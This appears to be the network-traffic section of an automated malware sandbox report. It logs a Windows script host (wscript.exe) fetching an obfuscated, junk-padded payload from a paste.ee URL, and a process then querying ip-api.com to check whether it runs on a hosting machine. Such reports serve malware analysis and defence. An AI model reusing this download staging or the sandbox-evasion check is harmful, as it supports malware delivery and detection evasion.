                                                                        Oct 7, 2024 17:09:17.916821957 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:17.916871071 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:17.917280912 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:17.917294979 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:17.917349100 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:17.917354107 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:17.917398930 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:17.917654037 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:17.917668104 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:17.917721987 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:17.917728901 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:17.917774916 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.001250982 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.001267910 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.001373053 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.001394033 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.001553059 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.001750946 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.001763105 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.001935005 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.001941919 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.001986980 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.002163887 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.002176046 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.002233028 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.002238989 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.002281904 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.002753973 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.002765894 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.002820969 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.002825975 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.002866983 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.003206968 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.003220081 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.003271103 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.003277063 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.003314972 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.003756046 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.003768921 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.003819942 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.003827095 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.003865957 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.004179001 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.004192114 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.004229069 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.004235983 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.004281998 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.004549980 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.004563093 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.004617929 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.004622936 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.004662037 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.367566109 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.367583036 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.367651939 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.367667913 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.367714882 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.368035078 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368046999 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368092060 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.368098021 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368134975 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.368452072 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368463993 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368520021 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.368525028 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368561029 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.368906975 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368917942 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.368967056 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.368973017 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.369008064 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.369317055 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.369330883 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.369398117 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.369404078 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.369443893 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.369689941 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.369702101 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.369755983 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.369761944 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.369801044 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.370126009 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.370137930 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.370165110 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.370187998 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.370193958 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.370209932 CEST44349709185.199.110.133192.168.2.7
                                                                        Oct 7, 2024 17:09:18.370223045 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.370239019 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.370263100 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:18.375267982 CEST49709443192.168.2.7185.199.110.133
                                                                        Oct 7, 2024 17:09:21.457122087 CEST4974480192.168.2.7208.95.112.1
                                                                        Oct 7, 2024 17:09:21.462225914 CEST8049744208.95.112.1192.168.2.7
                                                                        Oct 7, 2024 17:09:21.462368965 CEST4974480192.168.2.7208.95.112.1
                                                                        Oct 7, 2024 17:09:21.463181973 CEST4974480192.168.2.7208.95.112.1
                                                                        Oct 7, 2024 17:09:21.468106031 CEST8049744208.95.112.1192.168.2.7
                                                                        Oct 7, 2024 17:09:21.933489084 CEST8049744208.95.112.1192.168.2.7
                                                                        Oct 7, 2024 17:09:21.983004093 CEST4974480192.168.2.7208.95.112.1
                                                                        Oct 7, 2024 17:10:54.381762981 CEST8049744208.95.112.1192.168.2.7
                                                                        Oct 7, 2024 17:10:54.381942034 CEST4974480192.168.2.7208.95.112.1
                                                                        Oct 7, 2024 17:11:01.939011097 CEST4974480192.168.2.7208.95.112.1
                                                                        Oct 7, 2024 17:11:01.944025993 CEST8049744208.95.112.1192.168.2.7

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 7, 2024 17:09:04.693470955 CEST5478753192.168.2.71.1.1.1
                                                                        Oct 7, 2024 17:09:04.703460932 CEST53547871.1.1.1192.168.2.7
                                                                        Oct 7, 2024 17:09:14.637624979 CEST6159353192.168.2.71.1.1.1
                                                                        Oct 7, 2024 17:09:14.739252090 CEST53615931.1.1.1192.168.2.7
                                                                        Oct 7, 2024 17:09:21.420854092 CEST6005353192.168.2.71.1.1.1
                                                                        Oct 7, 2024 17:09:21.429907084 CEST53600531.1.1.1192.168.2.7

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Oct 7, 2024 17:09:04.693470955 CEST192.168.2.71.1.1.10x361aStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                        Oct 7, 2024 17:09:14.637624979 CEST192.168.2.71.1.1.10x70d4Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                        Oct 7, 2024 17:09:21.420854092 CEST192.168.2.71.1.1.10x145cStandard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Oct 7, 2024 17:09:04.703460932 CEST1.1.1.1192.168.2.70x361aNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                                        Oct 7, 2024 17:09:04.703460932 CEST1.1.1.1192.168.2.70x361aNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                                        Oct 7, 2024 17:09:14.739252090 CEST1.1.1.1192.168.2.70x70d4No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                        Oct 7, 2024 17:09:14.739252090 CEST1.1.1.1192.168.2.70x70d4No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                        Oct 7, 2024 17:09:14.739252090 CEST1.1.1.1192.168.2.70x70d4No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                        Oct 7, 2024 17:09:14.739252090 CEST1.1.1.1192.168.2.70x70d4No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                        Oct 7, 2024 17:09:21.429907084 CEST1.1.1.1192.168.2.70x145cNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • paste.ee
                                                                        • raw.githubusercontent.com
                                                                        • ip-api.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.749699188.114.97.3805368C:\Windows\System32\wscript.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 7, 2024 17:09:04.713771105 CEST173OUTGET /d/gvOd3 HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept: */*
                                                                        Accept-Language: en-CH
                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                        Host: paste.ee
                                                                        Oct 7, 2024 17:09:05.292005062 CEST806INHTTP/1.1 301 Moved Permanently
                                                                        Date: Mon, 07 Oct 2024 15:09:05 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Location: https://paste.ee/d/gvOd3
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eAkxdMFP%2BeWexVZKkxFK0MBaFaxhpZ8egLtbVuwSGZ8TFJoCqCydAJ1E8gkO4em%2FsK4gl6%2FGlFhN6P0lG1wrZbn%2FlF0GdEibbHh3RQ8qYaUzkL3Kp5jUhYZMqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                        Server: cloudflare
                                                                        CF-RAY: 8ceecf6adfdf0f80-EWR
                                                                        Data Raw: 61 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: ab<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.749744208.95.112.1807360C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 7, 2024 17:09:21.463181973 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                        Host: ip-api.com
                                                                        Connection: Keep-Alive
                                                                        Oct 7, 2024 17:09:21.933489084 CEST175INHTTP/1.1 200 OK
                                                                        Date: Mon, 07 Oct 2024 15:09:21 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 6
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Ttl: 60
                                                                        X-Rl: 44
                                                                        Data Raw: 66 61 6c 73 65 0a
                                                                        Data Ascii: false


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.749700188.114.97.34435368C:\Windows\System32\wscript.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-07 15:09:05 UTC173OUTGET /d/gvOd3 HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept: */*
                                                                        Accept-Language: en-CH
                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                        Host: paste.ee
                                                                        2024-10-07 15:09:07 UTC1198INHTTP/1.1 200 OK
                                                                        Date: Mon, 07 Oct 2024 15:09:06 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Cache-Control: max-age=2592000
                                                                        strict-transport-security: max-age=63072000
                                                                        x-frame-options: DENY
                                                                        x-content-type-options: nosniff
                                                                        x-xss-protection: 1; mode=block
                                                                        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s0YpyWF3bQLJbr3sonZTVHeJSsZtB0gbZsQC2wJRpJ1a7d51DQaNCQmqoqYyjZESU3TqM8xuYxScR95akWxm1l2SCCJqbEI9aEsDZpWbzQ8QKGh5eni8SFjaaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8ceecf6fab9d17a9-EWR
                                                                        2024-10-07 15:09:07 UTC171INData Raw: 31 66 37 66 0d 0a 0d 0a 0d 0a 76 61 72 37 36 30 20 3d 20 22 74 65 78 74 6f 37 35 39 22 0d 0a 76 61 72 37 36 31 20 3d 20 22 74 65 78 74 6f 37 36 30 22 0d 0a 76 61 72 37 36 32 20 3d 20 22 74 65 78 74 6f 37 36 31 22 0d 0a 76 61 72 37 36 33 20 3d 20 22 74 65 78 74 6f 37 36 32 22 0d 0a 76 61 72 37 36 34 20 3d 20 22 74 65 78 74 6f 37 36 33 22 0d 0a 76 61 72 37 36 35 20 3d 20 22 74 65 78 74 6f 37 36 34 22 0d 0a 76 61 72 37 36 36 20 3d 20 22 74 65 78 74 6f 37 36 35 22 0d 0a 76 61 72 37 36 37 20 3d 20 22 74 65 78 74
                                                                        Data Ascii: 1f7fvar760 = "texto759"var761 = "texto760"var762 = "texto761"var763 = "texto762"var764 = "texto763"var765 = "texto764"var766 = "texto765"var767 = "text
                                                                        2024-10-07 15:09:07 UTC1369INData Raw: 6f 37 36 36 22 0d 0a 76 61 72 37 36 38 20 3d 20 22 74 65 78 74 6f 37 36 37 22 0d 0a 76 61 72 37 36 39 20 3d 20 22 74 65 78 74 6f 37 36 38 22 0d 0a 0d 0a 76 61 72 37 37 30 20 3d 20 22 74 65 78 74 6f 37 36 39 22 0d 0a 76 61 72 37 37 31 20 3d 20 22 74 65 78 74 6f 37 37 30 22 0d 0a 76 61 72 37 37 32 20 3d 20 22 74 65 78 74 6f 37 37 31 22 0d 0a 76 61 72 37 37 33 20 3d 20 22 74 65 78 74 6f 37 37 32 22 0d 0a 76 61 72 37 37 34 20 3d 20 22 74 65 78 74 6f 37 37 33 22 0d 0a 76 61 72 37 37 35 20 3d 20 22 74 65 78 74 6f 37 37 34 22 0d 0a 76 61 72 37 37 36 20 3d 20 22 74 65 78 74 6f 37 37 35 22 0d 0a 76 61 72 37 37 37 20 3d 20 22 74 65 78 74 6f 37 37 36 22 0d 0a 76 61 72 37 37 38 20 3d 20 22 74 65 78 74 6f 37 37 37 22 0d 0a 76 61 72 37 37 39 20 3d 20 22 74 65 78 74 6f
                                                                        Data Ascii: o766"var768 = "texto767"var769 = "texto768"var770 = "texto769"var771 = "texto770"var772 = "texto771"var773 = "texto772"var774 = "texto773"var775 = "texto774"var776 = "texto775"var777 = "texto776"var778 = "texto777"var779 = "texto
                                                                        2024-10-07 15:09:07 UTC1369INData Raw: 20 3d 20 22 74 65 78 74 6f 38 33 31 22 0d 0a 76 61 72 38 33 33 20 3d 20 22 74 65 78 74 6f 38 33 32 22 0d 0a 76 61 72 38 33 34 20 3d 20 22 74 65 78 74 6f 38 33 33 22 0d 0a 76 61 72 38 33 35 20 3d 20 22 74 65 78 74 6f 38 33 34 22 0d 0a 76 61 72 38 33 36 20 3d 20 22 74 65 78 74 6f 38 33 35 22 0d 0a 76 61 72 38 33 37 20 3d 20 22 74 65 78 74 6f 38 33 36 22 0d 0a 76 61 72 38 33 38 20 3d 20 22 74 65 78 74 6f 38 33 37 22 0d 0a 76 61 72 38 33 39 20 3d 20 22 74 65 78 74 6f 38 33 38 22 0d 0a 0d 0a 76 61 72 38 34 30 20 3d 20 22 74 65 78 74 6f 38 33 39 22 0d 0a 76 61 72 38 34 31 20 3d 20 22 74 65 78 74 6f 38 34 30 22 0d 0a 76 61 72 38 34 32 20 3d 20 22 74 65 78 74 6f 38 34 31 22 0d 0a 76 61 72 38 34 33 20 3d 20 22 74 65 78 74 6f 38 34 32 22 0d 0a 76 61 72 38 34 34 20
                                                                        Data Ascii: = "texto831"var833 = "texto832"var834 = "texto833"var835 = "texto834"var836 = "texto835"var837 = "texto836"var838 = "texto837"var839 = "texto838"var840 = "texto839"var841 = "texto840"var842 = "texto841"var843 = "texto842"var844
                                                                        2024-10-07 15:09:07 UTC1369INData Raw: 0d 0a 76 61 72 38 39 37 20 3d 20 22 74 65 78 74 6f 38 39 36 22 0d 0a 76 61 72 38 39 38 20 3d 20 22 74 65 78 74 6f 38 39 37 22 0d 0a 76 61 72 38 39 39 20 3d 20 22 74 65 78 74 6f 38 39 38 22 0d 0a 0d 0a 76 61 72 39 30 30 20 3d 20 22 74 65 78 74 6f 38 39 39 22 0d 0a 76 61 72 39 30 31 20 3d 20 22 74 65 78 74 6f 39 30 30 22 0d 0a 76 61 72 39 30 32 20 3d 20 22 74 65 78 74 6f 39 30 31 22 0d 0a 76 61 72 39 30 33 20 3d 20 22 74 65 78 74 6f 39 30 32 22 0d 0a 76 61 72 39 30 34 20 3d 20 22 74 65 78 74 6f 39 30 33 22 0d 0a 76 61 72 39 30 35 20 3d 20 22 74 65 78 74 6f 39 30 34 22 0d 0a 76 61 72 39 30 36 20 3d 20 22 74 65 78 74 6f 39 30 35 22 0d 0a 76 61 72 39 30 37 20 3d 20 22 74 65 78 74 6f 39 30 36 22 0d 0a 76 61 72 39 30 38 20 3d 20 22 74 65 78 74 6f 39 30 37 22 0d
                                                                        Data Ascii: var897 = "texto896"var898 = "texto897"var899 = "texto898"var900 = "texto899"var901 = "texto900"var902 = "texto901"var903 = "texto902"var904 = "texto903"var905 = "texto904"var906 = "texto905"var907 = "texto906"var908 = "texto907"
                                                                        2024-10-07 15:09:07 UTC1369INData Raw: 22 74 65 78 74 6f 39 36 30 22 0d 0a 76 61 72 39 36 32 20 3d 20 22 74 65 78 74 6f 39 36 31 22 0d 0a 76 61 72 39 36 33 20 3d 20 22 74 65 78 74 6f 39 36 32 22 0d 0a 76 61 72 39 36 34 20 3d 20 22 74 65 78 74 6f 39 36 33 22 0d 0a 76 61 72 39 36 35 20 3d 20 22 74 65 78 74 6f 39 36 34 22 0d 0a 76 61 72 39 36 36 20 3d 20 22 74 65 78 74 6f 39 36 35 22 0d 0a 76 61 72 39 36 37 20 3d 20 22 74 65 78 74 6f 39 36 36 22 0d 0a 76 61 72 39 36 38 20 3d 20 22 74 65 78 74 6f 39 36 37 22 0d 0a 76 61 72 39 36 39 20 3d 20 22 74 65 78 74 6f 39 36 38 22 0d 0a 0d 0a 76 61 72 39 37 30 20 3d 20 22 74 65 78 74 6f 39 36 39 22 0d 0a 76 61 72 39 37 31 20 3d 20 22 74 65 78 74 6f 39 37 30 22 0d 0a 76 61 72 39 37 32 20 3d 20 22 74 65 78 74 6f 39 37 31 22 0d 0a 76 61 72 39 37 33 20 3d 20 22
                                                                        Data Ascii: "texto960"var962 = "texto961"var963 = "texto962"var964 = "texto963"var965 = "texto964"var966 = "texto965"var967 = "texto966"var968 = "texto967"var969 = "texto968"var970 = "texto969"var971 = "texto970"var972 = "texto971"var973 = "
                                                                        2024-10-07 15:09:07 UTC1369INData Raw: 32 22 0d 0a 76 61 72 31 30 32 34 20 3d 20 22 74 65 78 74 6f 31 30 32 33 22 0d 0a 76 61 72 31 30 32 35 20 3d 20 22 74 65 78 74 6f 31 30 32 34 22 0d 0a 76 61 72 31 30 32 36 20 3d 20 22 74 65 78 74 6f 31 30 32 35 22 0d 0a 76 61 72 31 30 32 37 20 3d 20 22 74 65 78 74 6f 31 30 32 36 22 0d 0a 76 61 72 31 30 32 38 20 3d 20 22 74 65 78 74 6f 31 30 32 37 22 0d 0a 76 61 72 31 30 32 39 20 3d 20 22 74 65 78 74 6f 31 30 32 38 22 0d 0a 0d 0a 76 61 72 31 30 33 30 20 3d 20 22 74 65 78 74 6f 31 30 32 39 22 0d 0a 76 61 72 31 30 33 31 20 3d 20 22 74 65 78 74 6f 31 30 33 30 22 0d 0a 76 61 72 31 30 33 32 20 3d 20 22 74 65 78 74 6f 31 30 33 31 22 0d 0a 76 61 72 31 30 33 33 20 3d 20 22 74 65 78 74 6f 31 30 33 32 22 0d 0a 76 61 72 31 30 33 34 20 3d 20 22 74 65 78 74 6f 31 30 33
                                                                        Data Ascii: 2"var1024 = "texto1023"var1025 = "texto1024"var1026 = "texto1025"var1027 = "texto1026"var1028 = "texto1027"var1029 = "texto1028"var1030 = "texto1029"var1031 = "texto1030"var1032 = "texto1031"var1033 = "texto1032"var1034 = "texto103
                                                                        2024-10-07 15:09:07 UTC1055INData Raw: 31 22 0d 0a 76 61 72 31 30 38 33 20 3d 20 22 74 65 78 74 6f 31 30 38 32 22 0d 0a 76 61 72 31 30 38 34 20 3d 20 22 74 65 78 74 6f 31 30 38 33 22 0d 0a 76 61 72 31 30 38 35 20 3d 20 22 74 65 78 74 6f 31 30 38 34 22 0d 0a 76 61 72 31 30 38 36 20 3d 20 22 74 65 78 74 6f 31 30 38 35 22 0d 0a 76 61 72 31 30 38 37 20 3d 20 22 74 65 78 74 6f 31 30 38 36 22 0d 0a 76 61 72 31 30 38 38 20 3d 20 22 74 65 78 74 6f 31 30 38 37 22 0d 0a 76 61 72 31 30 38 39 20 3d 20 22 74 65 78 74 6f 31 30 38 38 22 0d 0a 0d 0a 76 61 72 31 30 39 30 20 3d 20 22 74 65 78 74 6f 31 30 38 39 22 0d 0a 76 61 72 31 30 39 31 20 3d 20 22 74 65 78 74 6f 31 30 39 30 22 0d 0a 76 61 72 31 30 39 32 20 3d 20 22 74 65 78 74 6f 31 30 39 31 22 0d 0a 76 61 72 31 30 39 33 20 3d 20 22 74 65 78 74 6f 31 30 39
                                                                        Data Ascii: 1"var1083 = "texto1082"var1084 = "texto1083"var1085 = "texto1084"var1086 = "texto1085"var1087 = "texto1086"var1088 = "texto1087"var1089 = "texto1088"var1090 = "texto1089"var1091 = "texto1090"var1092 = "texto1091"var1093 = "texto109
                                                                        2024-10-07 15:09:07 UTC1369INData Raw: 37 30 30 30 0d 0a 38 20 3d 20 22 74 65 78 74 6f 31 31 32 37 22 0d 0a 76 61 72 31 31 32 39 20 3d 20 22 74 65 78 74 6f 31 31 32 38 22 0d 0a 0d 0a 76 61 72 31 31 33 30 20 3d 20 22 74 65 78 74 6f 31 31 32 39 22 0d 0a 76 61 72 31 31 33 31 20 3d 20 22 74 65 78 74 6f 31 31 33 30 22 0d 0a 76 61 72 31 31 33 32 20 3d 20 22 74 65 78 74 6f 31 31 33 31 22 0d 0a 76 61 72 31 31 33 33 20 3d 20 22 74 65 78 74 6f 31 31 33 32 22 0d 0a 76 61 72 31 31 33 34 20 3d 20 22 74 65 78 74 6f 31 31 33 33 22 0d 0a 76 61 72 31 31 33 35 20 3d 20 22 74 65 78 74 6f 31 31 33 34 22 0d 0a 76 61 72 31 31 33 36 20 3d 20 22 74 65 78 74 6f 31 31 33 35 22 0d 0a 76 61 72 31 31 33 37 20 3d 20 22 74 65 78 74 6f 31 31 33 36 22 0d 0a 76 61 72 31 31 33 38 20 3d 20 22 74 65 78 74 6f 31 31 33 37 22 0d 0a
                                                                        Data Ascii: 70008 = "texto1127"var1129 = "texto1128"var1130 = "texto1129"var1131 = "texto1130"var1132 = "texto1131"var1133 = "texto1132"var1134 = "texto1133"var1135 = "texto1134"var1136 = "texto1135"var1137 = "texto1136"var1138 = "texto1137"
                                                                        2024-10-07 15:09:07 UTC1369INData Raw: 76 61 72 31 31 38 37 20 3d 20 22 74 65 78 74 6f 31 31 38 36 22 0d 0a 76 61 72 31 31 38 38 20 3d 20 22 74 65 78 74 6f 31 31 38 37 22 0d 0a 76 61 72 31 31 38 39 20 3d 20 22 74 65 78 74 6f 31 31 38 38 22 0d 0a 0d 0a 76 61 72 31 31 39 30 20 3d 20 22 74 65 78 74 6f 31 31 38 39 22 0d 0a 76 61 72 31 31 39 31 20 3d 20 22 74 65 78 74 6f 31 31 39 30 22 0d 0a 76 61 72 31 31 39 32 20 3d 20 22 74 65 78 74 6f 31 31 39 31 22 0d 0a 76 61 72 31 31 39 33 20 3d 20 22 74 65 78 74 6f 31 31 39 32 22 0d 0a 76 61 72 31 31 39 34 20 3d 20 22 74 65 78 74 6f 31 31 39 33 22 0d 0a 76 61 72 31 31 39 35 20 3d 20 22 74 65 78 74 6f 31 31 39 34 22 0d 0a 76 61 72 31 31 39 36 20 3d 20 22 74 65 78 74 6f 31 31 39 35 22 0d 0a 76 61 72 31 31 39 37 20 3d 20 22 74 65 78 74 6f 31 31 39 36 22 0d 0a
                                                                        Data Ascii: var1187 = "texto1186"var1188 = "texto1187"var1189 = "texto1188"var1190 = "texto1189"var1191 = "texto1190"var1192 = "texto1191"var1193 = "texto1192"var1194 = "texto1193"var1195 = "texto1194"var1196 = "texto1195"var1197 = "texto1196"
